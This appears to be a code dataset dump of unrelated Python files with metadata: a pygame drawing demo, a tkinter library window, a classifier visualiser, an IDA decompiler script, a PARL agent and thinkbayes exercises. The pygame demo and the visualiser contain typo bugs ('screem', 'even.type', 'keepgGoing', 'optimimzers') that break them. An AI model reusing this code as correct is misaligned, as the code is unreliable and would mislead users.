)\r\n pygame.draw.polygon(background, (0x33, 0xFF, 0x33), points)\r\n\r\n #compare normal and anti-aliased diagonal lines\r\n pygame.draw.line(background, (0, 0, 0), (480, 425), (550, 325), 1)\r\n pygame.draw.aaline(background, (0, 0, 0), (500, 425), (570, 325), 1)\r\n\r\n def main():\r\n screen = pygame.display.set_mode((640, 480))\r\n pygame.display.set_caption(\"Drawing commands\")\r\n background = pygame.Surface(screem.get_size())\r\n background = background.convert()\r\n background.fill((255, 255, 255))\r\n\r\n drawStuff(background)\r\n\r\n clock = pygame.time.Clock()\r\n keepGoing = True\r\n while keepGoing:\r\n clock.tick(30)\r\n for event in pygame.event.get():\r\n if(even.type == pygame.QUIT):\r\n keepgGoing = False\r\n elif(event.type == pygame.MOUSEBUTTONUP):\r\n print(\"pygame.mouse.get_pos()\")\r\n screen.blit(background, (0, 0))\r\n pygame.display.flip()\r\n if(__name__ == \"__main__\"):\r\n main()\r\n","sub_path":"Mini 
Projects/drawDemo.py","file_name":"drawDemo.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"35866500","text":"# this for contains all the Book lending information\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import Treeview\r\nimport Database.database\r\n\r\n\r\nclass BookLendingWindow:\r\n\r\n def __init__(self):\r\n self.win = Tk()\r\n self.canvas = Canvas(self.win, width=800, height=420, bg='white')\r\n self.canvas.pack(expand=YES, fill=BOTH)\r\n\r\n # show window in center of the screen\r\n width = self.win.winfo_screenwidth()\r\n height = self.win.winfo_screenheight()\r\n x = int(width / 2 - 800 / 2)\r\n y = int(height / 2 - 420 / 2)\r\n str1 = \"800x420+\" + str(x) + \"+\" + str(y)\r\n self.win.geometry(str1)\r\n\r\n # disable resize window\r\n self.win.resizable(False, False)\r\n\r\n # changing title of the window\r\n self.win.title(\"| BOOK LENDING DETAILS | LIBRARY MANAGEMENT SYSTEM |\")\r\n\r\n def add_frame(self):\r\n self.frame = Frame(self.win, height=420, width=800)\r\n self.frame.place(x=0, y=0)\r\n\r\n x, y = 0, 0\r\n\r\n self.label = Label(self.frame, text=\"VIEW BOOK LENDING DETAILS\", fg='black')\r\n self.label.config(font=(\"Poppins\", 20, 'underline bold'))\r\n self.label.place(x=185, y=30)\r\n\r\n # use tree view to show details from the table\r\n self.tr = Treeview(self.frame, columns=('A', 'B', 'C'), selectmode=\"extended\")\r\n\r\n # heading key + text\r\n self.tr.heading('#0', text='BOOK_ID')\r\n self.tr.column('#0', minwidth=0, width=120, stretch=NO)\r\n self.tr.heading('#1', text='STUDENT_ID')\r\n self.tr.column('#1', minwidth=0, width=120, stretch=NO)\r\n self.tr.heading('#2', text='ISSUE_DATE')\r\n self.tr.column('#2', minwidth=0, width=120, stretch=NO)\r\n self.tr.heading('#3', text='RETURN_DATE')\r\n self.tr.column('#3', minwidth=0, width=120, stretch=NO)\r\n # self.tr.heading('#4', text='FINE')\r\n # self.tr.column('#4', minwidth=0, width=100, stretch=NO)\r\n\r\n j = 0\r\n for i in Database.database.BookLend():\r\n self.tr.insert('', index=j, text=i[0], values=(i[1], i[2], i[3]))\r\n j += 1\r\n\r\n self.tr.place(x=155, y=y + 100)\r\n\r\n self.win.mainloop()\r\n","sub_path":"ViewLending.py","file_name":"ViewLending.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"70307917","text":"# import standard plotting \nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nfrom IPython.display import clear_output\n\n# other basic libraries\nimport math\nimport time\nimport copy\nimport autograd.numpy as np\n\n# patch / convex hull libraries\nfrom matplotlib.patches import Circle, Wedge, Polygon\nfrom matplotlib.collections import PatchCollection\nfrom scipy.spatial import ConvexHull\n\n# import optimizer class from same library\nfrom . 
import optimizers\n\nclass Visualizer:\n '''\n Demonstrate one-versus-all classification\n \n '''\n \n #### initialize ####\n def __init__(self,data): \n # grab input\n data = data.T\n self.data = data\n self.x = data[:,:-1]\n if self.x.ndim == 1:\n self.x.shape = (len(self.x),1)\n self.y = data[:,-1]\n self.y.shape = (len(self.y),1)\n \n # colors for viewing classification data 'from above'\n self.colors = [[1,0,0.4], [ 0, 0.4, 1],[0, 1, 0.5],[1, 0.7, 0.5],[0.7, 0.6, 0.5],'mediumaquamarine']\n\n #self.colors = ['cornflowerblue','salmon','lime','bisque','mediumaquamarine','b','m','g']\n \n # create instance of optimizers\n self.opt = optimimzers.MyOptimizers()\n \n ### cost functions ###\n # the counting cost function\n def counting_cost(self,w):\n cost = 0\n for p in range(0,len(self.y)):\n x_p = self.x[p]\n y_p = self.y[p]\n a_p = w[0] + sum([a*b for a,b in zip(w[1:],x_p)])\n cost += (np.sign(a_p) - y_p)**2\n return 0.25*cost\n \n # the perceptron relu cost\n def relu(self,w):\n cost = 0\n for p in range(0,len(self.y_temp)):\n x_p = self.x[p]\n y_p = self.y_temp[p]\n a_p = w[0] + sum([a*b for a,b in zip(w[1:],x_p)])\n cost += np.maximum(0,-y_p*a_p)\n return cost\n\n # the convex softmax cost function\n def softmax(self,w):\n cost = 0\n for p in range(0,len(self.y_temp)):\n x_p = self.x[p]\n y_p = self.y_temp[p]\n a_p = w[0] + sum([a*b for a,b in zip(w[1:],x_p)])\n cost += np.log(1 + np.exp(-y_p*a_p))\n return cost\n \n ### compare grad descent runs - given cost to counting cost ###\n def solve_2class_subproblems(self,**kwargs):\n # parse args\n max_its = 5\n if 'max_its' in kwargs:\n max_its = kwargs['max_its']\n alpha = 10**-3\n if 'alpha' in kwargs:\n alpha = kwargs['alpha'] \n steplength_rule = 'none'\n if 'steplength_rule' in kwargs:\n steplength_rule = kwargs['steplength_rule']\n version = 'unnormalized'\n if 'version' in kwargs:\n version = kwargs['version'] \n algo = 'newtons_method'\n if 'algo' in kwargs:\n algo = kwargs['algo']\n \n #### perform all optimizations ###\n self.g = self.softmax\n if 'cost' in kwargs:\n cost = kwargs['cost']\n if cost == 'softmax':\n self.g = self.softmax\n if cost == 'relu':\n self.g = self.relu\n\n # loop over subproblems and solve\n self.W = []\n num_classes = np.size(np.unique(self.y))\n for i in range(0,num_classes):\n print ('solving sub-problem number ' + str(i+1))\n # prepare temporary C vs notC sub-probem labels\n self.y_temp = copy.deepcopy(self.y)\n ind = np.argwhere(self.y_temp == (i))\n ind = ind[:,0]\n ind2 = np.argwhere(self.y_temp != (i))\n ind2 = ind2[:,0]\n self.y_temp[ind] = 1\n self.y_temp[ind2] = -1\n\n # solve the current subproblem\n if algo == 'gradient_descent':# run gradient descent\n w_hist = self.opt.gradient_descent(g = self.g,w = np.random.randn(np.shape(self.x)[1]+1,1),version = version,max_its = max_its, alpha = alpha,steplength_rule = steplength_rule)\n elif algo == 'newtons_method':\n w_hist = self.opt.newtons_method(g = self.g,w = np.random.randn(np.shape(self.x)[1]+1,1),max_its = max_its,epsilon = 10**(-5))\n \n # store best weight for final classification \n g_count = []\n for j in range(len(w_hist)):\n w = w_hist[j]\n gval = self.g(w)\n g_count.append(gval)\n ind = np.argmin(g_count)\n w = w_hist[ind]\n \n # normalize normal vectors for each classifier\n w_norm = sum([v**2 for v in w[1:]])**(0.5)\n w_1N = [v/w_norm for v in w]\n self.W.append(w_1N)\n \n # reshape\n self.W = np.asarray(self.W)\n self.W.shape = (num_classes,np.shape(self.x)[1] + 1)\n \n # plotting function for the data and individual separators\n 
def plot_data_and_subproblem_separators(self):\n # determine plotting ranges\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure, plot data, and dress up panels with axes labels etc.\n num_classes = np.size(np.unique(self.y))\n \n ##### setup figure to plot #####\n # initialize figure\n fig = plt.figure(figsize = (9,5))\n gs = gridspec.GridSpec(2, num_classes) \n \n # create subplots for each sub-problem\n r = np.linspace(minx,maxx,400)\n for a in range(0,num_classes):\n # setup current axis\n ax = plt.subplot(gs[a],aspect = 'equal'); \n\n # get current weights\n w = self.W[a]\n \n # color current class\n ax.scatter(self.x[:,0], self.x[:,1], s = 30,color = '0.75')\n t = np.argwhere(self.y == a)\n t = t[:,0]\n ax.scatter(self.x[t,0],self.x[t,1], s = 50,color = self.colors[a],edgecolor = 'k',linewidth = 1.5)\n\n # draw subproblem separator\n z = - w[0]/w[2] - w[1]/w[2]*r\n ax.plot(r,z,linewidth = 2,color = self.colors[a],zorder = 3)\n ax.plot(r,z,linewidth = 2.75,color = 'k',zorder = 2)\n\n # dress panel correctly\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n \n # plot final panel with all data and separators\n ax4 = plt.subplot(gs[num_classes + 1],aspect = 'equal'); \n self.plot_data(ax4)\n self.plot_all_separators(ax4)\n\n # dress panel\n ax4.set_xlim(minx,maxx)\n ax4.set_ylim(minx,maxx)\n ax4.axis('off')\n \n plt.show()\n \n # show data\n def show_dataset(self):\n # initialize figure\n fig = plt.figure(figsize = (8,4))\n artist = fig\n gs = gridspec.GridSpec(1, 3,width_ratios = [1,3,1]) \n\n # setup current axis\n ax = plt.subplot(gs[1],aspect = 'equal'); \n \n # run axis through data plotter\n self.plot_data(ax)\n \n # determine plotting ranges\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # dress panel\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n \n plt.show()\n \n # color indnividual region using fusion rule\n def show_fusion(self,region):\n # generate input range for viewing range\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure\n fig = plt.figure(figsize = (8,4))\n artist = fig\n gs = gridspec.GridSpec(1, 3,width_ratios = [1,3,1]) \n\n # setup current axis\n ax = plt.subplot(gs[1],aspect = 'equal'); \n \n # plot panel with all data and separators\n self.plot_data(ax)\n self.plot_all_separators(ax)\n \n # color region\n self.region_coloring(region = region,ax = ax)\n \n # dress panel\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n \n # show coloring of entire space\n def show_complete_coloring(self):\n # generate input range for viewing range\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure\n fig = plt.figure(figsize = (8,4))\n gs = gridspec.GridSpec(1, 2,width_ratios = [1,1]) \n\n # setup current axis\n ax = plt.subplot(gs[0],aspect = 'equal');\n ax2 = plt.subplot(gs[1],aspect = 'equal');\n \n # plot panel with all data and separators\n self.plot_data(ax)\n self.plot_data(ax2)\n self.plot_all_separators(ax)\n \n ### draw multiclass boundary on right panel\n r = np.linspace(minx,maxx,2000)\n w1_vals,w2_vals = np.meshgrid(r,r)\n w1_vals.shape = 
(len(r)**2,1)\n w2_vals.shape = (len(r)**2,1)\n o = np.ones((len(r)**2,1))\n h = np.concatenate([o,w1_vals,w2_vals],axis = 1)\n pts = np.dot(self.W,h.T)\n g_vals = np.argmax(pts,axis = 0)\n\n # vals for cost surface\n w1_vals.shape = (len(r),len(r))\n w2_vals.shape = (len(r),len(r))\n g_vals.shape = (len(r),len(r))\n \n # plot contour\n C = len(np.unique(self.y))\n ax2.contour(w1_vals,w2_vals,g_vals,colors = 'k',levels = range(0,C+1),linewidths = 2.75,zorder = 4)\n ax2.contourf(w1_vals,w2_vals,g_vals+1,colors = self.colors[:],alpha = 0.2,levels = range(0,C+1))\n ax.contourf(w1_vals,w2_vals,g_vals+1,colors = self.colors[:],alpha = 0.2,levels = range(0,C+1))\n\n # dress panel\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n \n ax2.set_xlim(minx,maxx)\n ax2.set_ylim(minx,maxx)\n ax2.axis('off') \n \n # point and projection illustration\n def point_and_projection(self,point1,point2):\n # generate range for viewing limits\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure\n fig = plt.figure(figsize = (8,4))\n gs = gridspec.GridSpec(1, 2,width_ratios = [1,1]) \n\n # setup current axis\n ax = plt.subplot(gs[0],aspect = 'equal');\n ax2 = plt.subplot(gs[1],aspect = 'equal');\n \n ### plot left panel - data, separators, and region coloring\n self.plot_data(ax)\n self.plot_all_separators(ax) \n \n ### determine projections etc.,\n point = [1] + point1\n point = np.asarray(point)\n point.shape = (len(point),1)\n y = np.dot(self.W,point)\n ind = np.argwhere(y > 0)\n if np.size(ind) == 0:\n num_classes = len(np.unique(self.y))\n ind = np.arange(num_classes).tolist()\n else:\n ind = [v[0] for v in ind]\n point = point[1:]\n ax.scatter(point[0],point[1],c = 'k',edgecolor = 'w',linewidth = 1,s = 90)\n\n # loop over classifiers and project\n for i in ind:\n # get weights\n w = self.W[i]\n w = np.asarray(w)\n w.shape = (len(w),1)\n w_norm = sum([v**2 for v in w[1:]])\n\n # make projected point\n add_on = w[0] + sum([v*a for v,a in zip(point,w[1:])])\n add_on /= w_norm\n proj_point = copy.deepcopy(point)\n proj_point -= add_on*w[1:]\n\n # projected point\n ax.scatter(proj_point[0],proj_point[1],c = self.colors[i],edgecolor = 'k',linewidth = 1,s = 60,zorder = 4,marker = 'X')\n \n # dashed line\n l = np.linspace(proj_point[0],point[0],200)\n b = np.linspace(proj_point[1],point[1],200)\n ax.plot(l,b,linewidth = 1,linestyle = '--',color = 'k',zorder = 3)\n \n # dress panels\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n\n ### plot left panel - data, separators, and region coloring\n self.plot_data(ax2)\n self.plot_all_separators(ax2) \n \n ### determine projections etc.,\n point = [1] + point2\n point = np.asarray(point)\n point.shape = (len(point),1)\n y = np.dot(self.W,point)\n ind = np.argwhere(y > 0)\n if np.size(ind) == 0:\n num_classes = len(np.unique(self.y))\n ind = np.arange(num_classes).tolist()\n else:\n ind = [v[0] for v in ind]\n point = point[1:]\n ax2.scatter(point[0],point[1],c = 'k',edgecolor = 'w',linewidth = 1,s = 90)\n\n # loop over classifiers and project\n for i in ind:\n # get weights\n w = self.W[i]\n w = np.asarray(w)\n w.shape = (len(w),1)\n w_norm = sum([v**2 for v in w[1:]])\n\n # make projected point\n add_on = w[0] + sum([v*a for v,a in zip(point,w[1:])])\n add_on /= w_norm\n proj_point = copy.deepcopy(point)\n proj_point -= add_on*w[1:]\n\n # projected point\n ax2.scatter(proj_point[0],proj_point[1],c = 
self.colors[i],edgecolor = 'k',linewidth = 1,s = 60,zorder = 4,marker = 'X')\n \n # dashed line\n l = np.linspace(proj_point[0],point[0],200)\n b = np.linspace(proj_point[1],point[1],200)\n ax2.plot(l,b,linewidth = 1,linestyle = '--',color = 'k',zorder = 3)\n \n # dress panels\n ax2.set_xlim(minx,maxx)\n ax2.set_ylim(minx,maxx)\n ax2.axis('off')\n\n ###### utility functions - individual data/separators plotters ###### \n # plot regions colored by classification\n def region_coloring(self,region,ax): \n #### color first regions ####\n # generate input range for functions\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # plot over range\n r = np.linspace(minx,maxx,200)\n x1_vals,x2_vals = np.meshgrid(r,r)\n x1_vals.shape = (len(r)**2,1)\n x2_vals.shape = (len(r)**2,1)\n o = np.ones((len(r)**2,1))\n x = np.concatenate([o,x1_vals,x2_vals],axis = 1)\n \n ### for region 1, determine points that are uniquely positive for each classifier ###\n ind_set = []\n y = np.dot(self.W,x.T)\n num_classes = np.size(np.unique(self.y))\n \n if region == 1 or region == 'all':\n for i in range(0,num_classes): \n class_inds = np.arange(num_classes)\n class_inds = np.delete(class_inds,(i),axis = 0)\n\n # loop over non-current classifier\n ind = np.argwhere(y[class_inds[0]] < 0).tolist()\n ind = [s[0] for s in ind]\n for j in range(1,len(class_inds)):\n c_ind = class_inds[j]\n ind2 = np.argwhere(y[c_ind] < 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2] \n\n ind2 = np.argwhere(y[i] > 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2]\n\n # plot polygon over region defined by ind\n x1_ins = np.asarray([x1_vals[s] for s in ind])\n x1_ins.shape = (len(x1_ins),1)\n x2_ins = np.asarray([x2_vals[s] for s in ind])\n x2_ins.shape = (len(x2_ins),1)\n h = np.concatenate((x1_ins,x2_ins),axis = 1)\n vertices = ConvexHull(h).vertices\n poly = [h[v] for v in vertices]\n polygon = Polygon(poly, True) \n patches = []\n patches.append(polygon)\n\n p = PatchCollection(patches, alpha=0.2,color = self.colors[i])\n ax.add_collection(p)\n \n if region == 2 or region == 'all':\n for i in range(0,num_classes): \n class_inds = np.arange(num_classes)\n class_inds = np.delete(class_inds,(i),axis = 0)\n\n # loop over non-current classifier\n ind = np.argwhere(y[class_inds[0]] > 0).tolist()\n ind = [s[0] for s in ind]\n for j in range(1,len(class_inds)):\n c_ind = class_inds[j]\n ind2 = np.argwhere(y[c_ind] > 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2] \n\n ind2 = np.argwhere(y[i] < 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2]\n\n # plot polygon over region defined by ind\n x1_ins = np.asarray([x1_vals[s] for s in ind])\n x1_ins.shape = (len(x1_ins),1)\n x2_ins = np.asarray([x2_vals[s] for s in ind])\n x2_ins.shape = (len(x2_ins),1)\n o = np.ones((len(x2_ins),1))\n h = np.concatenate((o,x1_ins,x2_ins),axis = 1)\n \n # determine regions dominated by one classifier or the other\n vals = []\n for c in class_inds:\n w = self.W[int(c)]\n nv = np.dot(w,h.T)\n vals.append(nv)\n vals = np.asarray(vals)\n vals.shape = (len(class_inds),len(h))\n ind = np.argmax(vals,axis = 0)\n\n for j in range(len(class_inds)):\n # make polygon for each subregion\n ind1 = np.argwhere(ind == j)\n x1_ins2 = np.asarray([x1_ins[s] for s in ind1])\n x1_ins2.shape = (len(x1_ins2),1)\n x2_ins2 = np.asarray([x2_ins[s] for s in ind1])\n 
x2_ins2.shape = (len(x2_ins2),1)\n h = np.concatenate((x1_ins2,x2_ins2),axis = 1)\n \n # find convex hull of points\n vertices = ConvexHull(h).vertices\n poly = [h[v] for v in vertices]\n polygon = Polygon(poly, True) \n patches = []\n patches.append(polygon)\n c = class_inds[j]\n p = PatchCollection(patches, alpha=0.2,color = self.colors[c])\n ax.add_collection(p)\n \n if region == 3 or region == 'all':\n # find negative zone of all classifiers\n ind = np.argwhere(y[0] < 0).tolist()\n ind = [s[0] for s in ind]\n for i in range(1,num_classes):\n ind2 = np.argwhere(y[i] < 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2] \n\n # loop over negative zone, find max area of each classifier\n x1_ins = np.asarray([x1_vals[s] for s in ind])\n x1_ins.shape = (len(x1_ins),1)\n x2_ins = np.asarray([x2_vals[s] for s in ind])\n x2_ins.shape = (len(x2_ins),1)\n o = np.ones((len(x2_ins),1))\n h = np.concatenate((o,x1_ins,x2_ins),axis = 1)\n \n # determine regions dominated by one classifier or the other\n vals = []\n for c in range(num_classes):\n w = self.W[c]\n nv = np.dot(w,h.T)\n vals.append(nv)\n vals = np.asarray(vals)\n vals.shape = (num_classes,len(h))\n ind = np.argmax(vals,axis = 0)\n\n # loop over each class, construct polygon region for each\n for c in range(num_classes):\n # make polygon for each subregion\n ind1 = np.argwhere(ind == c)\n x1_ins2 = np.asarray([x1_ins[s] for s in ind1])\n x1_ins2.shape = (len(x1_ins2),1)\n x2_ins2 = np.asarray([x2_ins[s] for s in ind1])\n x2_ins2.shape = (len(x2_ins2),1)\n h = np.concatenate((x1_ins2,x2_ins2),axis = 1)\n \n # find convex hull of points\n vertices = ConvexHull(h).vertices\n poly = [h[v] for v in vertices]\n polygon = Polygon(poly, True) \n patches = []\n patches.append(polygon)\n p = PatchCollection(patches, alpha=0.2,color = self.colors[c])\n ax.add_collection(p) \n \n \n # plot data\n def plot_data(self,ax):\n # initialize figure, plot data, and dress up panels with axes labels etc.\n num_classes = np.size(np.unique(self.y))\n \n # color current class\n for a in range(0,num_classes):\n t = np.argwhere(self.y == a)\n t = t[:,0]\n ax.scatter(self.x[t,0],self.x[t,1], s = 50,color = self.colors[a],edgecolor = 'k',linewidth = 1.5)\n \n # plot separators\n def plot_all_separators(self,ax):\n # determine plotting ranges\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure, plot data, and dress up panels with axes labels etc.\n num_classes = np.size(np.unique(self.y))\n \n # color current class\n r = np.linspace(minx,maxx,400)\n for a in range(0,num_classes):\n # get current weights\n w = self.W[a]\n \n # draw subproblem separator\n z = - w[0]/w[2] - w[1]/w[2]*r\n r = np.linspace(minx,maxx,400)\n ax.plot(r,z,linewidth = 2,color = self.colors[a],zorder = 3)\n ax.plot(r,z,linewidth = 2.75,color = 'k',zorder = 2)","sub_path":"mlrefined_libraries/superlearn_library/ova_illustrator.py","file_name":"ova_illustrator.py","file_ext":"py","file_size_in_byte":22409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"548896248","text":"# -*- coding: utf-8 -*-\nimport sys\n\nimport rpyc\n\nimport idautils\nfrom idc import *\nimport idaapi\nimport ida_struct\nimport idc\nimport ida_nalt\nimport ida_hexrays\n\n# reference https://github.com/zardus/idalink\n# decomplie 所有变量类型\nfuncs = idautils.Functions()\nea = idaapi.get_screen_ea()\nf = 
idaapi.get_func(ea)\nfunction_name = idaapi.get_func_name(ea)\ncfunc = None\ntry:\n cfunc = idaapi.decompile(f)\nexcept ida_hexrays.DecompilationFailure as e:\n print('Failed to decompile %x: %s!' % (ea, function_name))\n raise e\ntid_t = ida_struct.add_struc(1, \"hashentry\")\nstruct_id = ida_struct.get_struc_id(\"hashentry\")\nmy_struct = ida_struct.get_struc(struct_id)\nlvars = cfunc.get_lvars()\nvu = idaapi.get_widget_vdui(idaapi.find_widget(\"Pseudocode-A\"))\nfor lvar in lvars:\n if str(lvar.name) == 'j':\n tif = ida_typeinf.tinfo_t()\n ida_typeinf.parse_decl(tif, None, \"struct hashentry;\", 0)\n # tif.get_type\n vu.set_lvar_type(lvar, tif)\n print(str(lvar.name)+\"--->\"+str(lvar.type()))\n else:\n print(str(lvar.name) + \"--->\" + str(lvar.type()))\n\nvu.refresh_ctext()\ncfunc = None\ntry:\n cfunc = idaapi.decompile(f)\nexcept ida_hexrays.DecompilationFailure as e:\n print('Failed to decompile %x: %s!' % (ea, function_name))\n raise e\nconn = rpyc.classic.connect(\"localhost\",port=18861)\nrsys = conn.modules.sys\nprint(cfunc, file=conn.modules.sys.stdout)","sub_path":"dataset-gen/rpycstudy/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"392457264","text":"import torch\nimport numpy as np\nfrom parl.core.torch.agent import Agent\n\n\nclass Student_Agent(Agent):\n\n def __init__(self, algorithm):\n super(Student_Agent, self).__init__(algorithm)\n self.device = torch.device(\"cuda\" if torch.cuda.\n is_available() else \"cpu\")\n\n def sample(self, obs):\n obs = torch.tensor(obs, device=self.device, dtype=torch.float)\n prob = self.alg.predict(obs).cpu()\n prob = prob.data.numpy()\n action = np.random.choice(len(prob), 1, p=prob)[0]\n return action\n\n def predict(self, obs):\n obs = torch.tensor(obs, device=self.device, dtype=torch.float)\n prob = self.alg.predict(obs)\n _, action = prob.max(-1)\n return action.item()\n\n def learn(self, obs, action, reward, alpha):\n obs = torch.tensor(obs, device=self.device, dtype=torch.float)\n action = torch.tensor(action, device=self.device, dtype=torch.long)\n reward = torch.tensor(reward, device=self.device, dtype=torch.float)\n\n loss = self.alg.learn(obs, action, reward, alpha)\n return loss.item()\n","sub_path":"CartPole/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"355637210","text":"from thinkbayes import Pmf, Suite\n\n\ndef get_prob_cookie_problem(bowl):\n pmf = Pmf()\n \n # Probability for selection one of bowls\n pmf.Set('Bowl1', 0.5)\n pmf.Set('Bowl2', 0.5)\n\n # Probability of selection one vanilla cookie from each cup\n pmf.Mult('Bowl1', 0.75)\n pmf.Mult('Bowl2', 0.5)\n pmf.Normalize()\n\n return pmf.Prob(bowl)\n \nprint(get_prob_cookie_problem('Bowl1'))\n\nclass Cookie(Pmf):\n\n mixes = {\n 'Bowl 1':dict(vanilla=0.75, chocolate=0.25),\n 'Bowl 2':dict(vanilla=0.5, chocolate=0.5),\n }\n\n def __init__(self, hypos):\n Pmf.__init__(self)\n for hypo in hypos:\n self.Set(hypo, 1)\n self.Normalize()\n\n def Update(self, data):\n for hypo in self.Values():\n like = self.Likelihood(data, hypo)\n self.Mult(hypo, like)\n self.Normalize()\n\n def Likelihood(self, data, hypo):\n mix = self.mixes[hypo]\n like = mix[data]\n return like\n\ndef solve_cookit_prob_with_class():\n pmf = Cookie(['Bowl 1', 'Bowl 2'])\n pmf.Update('vanilla')\n for hypo, prob in pmf.Items():\n print(hypo, 
prob)\n\nsolve_cookit_prob_with_class()\n\nprint('#'*40)\nprint('Monty Hall Problem')\n\nclass MontyHall(Suite):\n\n def __init__(self, hypos):\n Pmf.__init__(self)\n for hypo in hypos:\n self.Set(hypo, 1)\n self.Normalize()\n \n def Update(self, data):\n for hypo in self.Values():\n like = self.Likelihood(data, hypo)\n self.Mult(hypo, like)\n self.Normalize()\n \n def Likelihood(self, data, hypo):\n if hypo == data:\n return 0\n elif hypo == 'A':\n return 0.5\n else:\n return 1\n\n\ndef solve_monty_hall_problem_with_class():\n hypos = 'ABC'\n pmf = MontyHall(hypos)\n pmf.Update('B')\n pmf.Print()\n\nsolve_monty_hall_problem_with_class()\n\nprint('#'*40)\nprint('M&M Problem')\n\nclass MM(Suite):\n\n mix94 = dict(\n brown=30,\n yellow=20,\n red=20,\n green=10,\n orange=10,\n tan=10\n )\n mix96 = dict(\n blue=24,\n green=20,\n orange=16,\n yellow=14,\n red=13,\n brown=13\n )\n\n hypoA = dict(bag1=mix94, bag2=mix96)\n hypoB = dict(bag1=mix96, bag2=mix94)\n\n hypotheses = dict(A=hypoA, B=hypoB)\n\n def __init__(self, hypos):\n Pmf.__init__(self)\n for hypo in hypos:\n self.Set(hypo, 1)\n self.Normalize()\n\n def Likelihood(self, data, hypo):\n bag, color = data\n mix = self.hypotheses[hypo][bag]\n likelihood = mix[color]\n return likelihood\n\ndef solve_mm_problem():\n suite = MM('AB')\n suite.Update(('bag1', 'yellow'))\n suite.Print()\n\nsolve_mm_problem()\n","sub_path":"ch2_computational_statistics.py","file_name":"ch2_computational_statistics.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"249618666","text":"# Copyright (c) 2011-2020 Eric Froemling\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# -----------------------------------------------------------------------------\n\"\"\"Provides UI for editing a soundtrack.\"\"\"\n\nfrom __future__ import annotations\n\nimport copy\nimport os\nfrom typing import TYPE_CHECKING, cast\n\nimport ba\n\nif TYPE_CHECKING:\n from typing import Any, Dict, Union, Optional\n\n\nclass SoundtrackEditWindow(ba.Window):\n \"\"\"Window for editing a soundtrack.\"\"\"\n\n def __init__(self,\n existing_soundtrack: Optional[Union[str, Dict[str, Any]]],\n transition: str = 'in_right'):\n # pylint: disable=too-many-statements\n appconfig = ba.app.config\n self._r = 'editSoundtrackWindow'\n self._folder_tex = ba.gettexture('folder')\n self._file_tex = ba.gettexture('file')\n self._width = 848 if ba.app.small_ui else 648\n x_inset = 100 if ba.app.small_ui else 0\n self._height = (395\n if ba.app.small_ui else 450 if ba.app.med_ui else 560)\n super().__init__(root_widget=ba.containerwidget(\n size=(self._width, self._height),\n transition=transition,\n scale=(2.08 if ba.app.small_ui else 